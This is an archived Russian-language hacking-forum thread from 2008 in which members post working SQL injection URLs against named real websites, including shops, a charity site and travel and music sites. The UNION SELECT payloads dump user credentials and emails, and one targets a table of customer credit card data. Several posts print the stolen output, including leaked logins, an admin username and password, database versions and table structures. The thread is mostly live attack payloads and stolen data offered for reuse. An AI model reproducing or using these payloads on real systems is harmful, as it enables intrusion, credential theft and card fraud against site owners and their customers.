ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #6881  
Старый 18.11.2008, 02:49
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Четвёртая ветка, шоп.

http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,id,passw ord,username,email),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39+from+users/*&cat_id=46&sub_id=312

1::flash62::wes::wes@joedesigns.com

Логинимся тут вроде
http://www.worldfolkart.org/cart_account.php

Картон )))

http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,cc_num,c c_name,cc_type),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39+from+orders/*&cat_id=46&sub_id=312

по count 4787 штук в базе, without cvv. Можете дампить, я плохими делами не занимаюсь.
Удачи )))
 

  #6882  
Старый 18.11.2008, 21:58
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Инъекция:
Цитата:
http://www.srpska.ru/article.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Инфо:
Цитата:
Database Version: 5.0.60
Database name: db_ansimov_7
User name: dbu_ansimov_1@localhost
Структура:
Код:
categories:
   u_id
   cat_id
   cat_name
   cat_parent
   cat_descr

comm_members_list:
   comm_id
   u_id
   u_status
   comm_name

comments:
   comm_id
   comm_parent_id
   comm_parent_type
   comm_date
   comm_header
   comm_content
   comm_autor


Инъекция:
Цитата:
http://zvisti.com.ua/info.php?id=-1+union+select+1,2,3,4,5,666,7,8,9,10,11,12--
Инфо:
Цитата:
Database Version: 5.0.45
Database name: zvisti_db
User name: zvisti_user@localhost
Структуру лень раскрывать было...




Инъекция:
Цитата:
http://www.anshlagm.ru/a-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Инфо:
Цитата:
Database Version: 4.1.22-log
Database name: melbis
User name: melbis@10.0.1.201

Последний раз редактировалось ChaaK; 18.11.2008 в 22:52..
 

  #6883  
Старый 18.11.2008, 22:10
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829

Репутация: 405
Отправить сообщение для Neoveneficus с помощью ICQ
По умолчанию

Код:
http://www.s7tour.ru/hotel.php?country=-1+union+select+1,version()/*

*** SQLBruter's report [ Tuesday 18th 0f November 2008 08:55:02 PM ] ***

[~] Names of tables bruteforce

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM hotel/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM news/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM poll_user/*
 

  #6884  
Старый 18.11.2008, 22:42
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

http://www.s7tour.ru/hotel.php?country=-1+UNION+SELECT+1,concat_ws(0x3a,username,userpass) +FROM+poll_user/*
 

  #6885  
Старый 19.11.2008, 02:41
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://irannag hme.com/viewalbums.php?artistId=-1+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword),3,4,5,6,7,8,9,10+from+users--

http://mp3hunga ma.com/music/viewalbums.php?artistId=-5+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword,email),3,4,5,6,7,8,9,10+from+users--
 

  #6886  
Старый 19.11.2008, 11:02
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

https://www.keeperstop.com/pages.php?id=7+union+select+1,2,3,version(),5,6,7/*

5.0.44-log

Таблица registrations
 

  #6887  
Старый 19.11.2008, 12:41
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

http://www.chicgemsetc.com/press_article.php?id=-21+union+select+1,2,3,4,5,version(),7,8,9--

5.0.67-log

Ювелирка вроде.
 

  #6888  
Старый 19.11.2008, 19:06
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Инъекция:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Код:
DB Version - 5.0.51a-log
DB User    - charity_charity@localhost
DB Name    - charity_charity
Таблицы:
Цитата:
beg_begs
beg_categories
beg_manager
beg_scam
beg_unwelcome
beg_users
categories
games
ratings
Таблица beg_users:
Цитата:
ID
beg_id
ip
Таблица beg_manager:
Цитата:
id
name
passwd
Таблица beg_unwelcome:
Цитата:
ID
email

Только что-то пароли не подходят

Email:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,email,4,5,6,7,8,9,10,11,12,13+f rom+beg_unwelcome--
Пароль:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,passwd,4,5,6,7,8,9,10,11,12,13+ from+beg_manager--
 

  #6889  
Старый 19.11.2008, 19:59
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
bigmike : bigdent
 

  #6890  
Старый 20.11.2008, 02:14
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Ещё одна ювелирка вроде.

http://www.atlasjewellery.com/enquiry.php?id=-147+union+select+1,2,3,4,5,6,version()/*

5.0.41-community-log

Последний раз редактировалось Constantine; 26.11.2008 в 19:34..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ